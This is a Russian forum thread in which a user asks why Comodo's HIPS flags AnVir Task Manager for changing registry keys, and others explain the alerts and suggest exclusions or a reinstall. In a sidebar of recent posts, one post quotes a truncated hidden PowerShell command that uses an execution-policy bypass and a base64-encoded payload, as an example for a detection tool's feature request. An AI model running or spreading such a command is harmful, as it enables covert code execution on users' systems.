Перейти к содержанию
vitrus

Anvir или Comodo пытается изменить ключи реестра ?

Recommended Posts

vitrus

У меня вдруг Comodo стал показывать такие вещи:

Anvir пытается изменить ключи реестра

Microsoft Windows Policies,

и SystemCertificates,

и еще ключ реестра Wow6432Node.

При том сам Comodo выдает такую строчку запуска своего же файла:

cfpconfig.exe -a -p COMODO%20R.P. -n AnVir.exe

Может он сам как то пытается с AnVir бороться?

Кто нибудь подскажите что эта строчка запуска говорит?

Ветка на форуме программы:

http://anvir.net/forum/viewtopic.php?f=4&t=839

сайт английской версии:

http://www.anvir.com

Дополнительно интересная статья о Wow6432Node:

http://www.gotdotnet.ru/blogs/not-a-kernel-guy/4411/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Rustock.C

Ну, так попробуйте добавить Anvir в исключение Comodo.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vitrus
Ну, так попробуйте добавить Anvir в исключение Comodo.

А что это даст?

Зачем Comodo пишет что Anvir все это делает?

Если я его внесу в исключения то изменений в реестре не будет?

Или Comodo просто пишет это что бы попугать и удалить программу Anvir,

но тогда зачем дезинформировать пользователя?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Rustock.C
А что это даст?

Зачем Comodo пишет что Anvir все это делает?

Если я его внесу в исключения то изменений в реестре не будет?

Или Comodo просто пишет это что бы попугать и удалить программу Anvir,

но тогда зачем дезинформировать пользователя?

Я так понимаю, срабатывает HIPS.

Если будет сделано добавление в исключение, то Comodo никак не будет контролировать Anvir, но при этом будут происходить изменения в реестре со стороны Anvir.

Comodo выдаёт такой алерт, потому что происходит обращение, а также изменение критических системных файлов.

P.S. Не могли бы Вы прикрепить скрин оповещения Comodo?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
canni2
Если будет сделано добавление в исключение, то Comodo никак не будет контролировать Anvir, но при этом будут происходить изменения в реестре со стороны Anvir.

То, что Comodo контролирует активность - это понятно. Нужно выяснить для чего anvir лезет в реестр. Если так было задумано разработчиками и без этого анвир работать не будет - то, ответ очевиден: разрешать. А вообще - у комода есть такой грешок: иногда после обновлений вдруг обнаруживается некая активность приложений, причём не ясно - они всегда такую активность вели, а комод не видел, или они только сейчас чего-то зашевелились и комод-молодец их засёк.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Chekm
Ну, так попробуйте добавить Anvir в исключение Comodo.

У меня установлен и Anvir и Comodo.

Вчера обновил Comodo IS до версии 5.8 Прочитал обсуждение, стало интересно... После обновления, читай переустановки Comodo, Anvir ещё не разу не запускался. Попробовал запустить... Comodo запустил Anvir в песочнице, добавил Anvir в Доверенные и запустил опять... все как всегда никаких аллертов... Запустил Anvir с правами админа - тоже самое...

Я бы посоветовал не заносить Anvir в исключения, а удалить, вычистить хвосты из реестра, скачать с оф. сайта и посмотреть на результат...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
triumf

Я бы посоветовал не заносить Anvir в исключения, а удалить, вычистить хвосты из реестра, скачать с оф. сайта и посмотреть на результат...

Такая же проблема была, при том что Anvir скачан с оф.сайта. На мой вгляд либо добовлять в исключения Comodo IS, либо сносить когото из них, т.к. они на мой взгляд не очень дружат.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×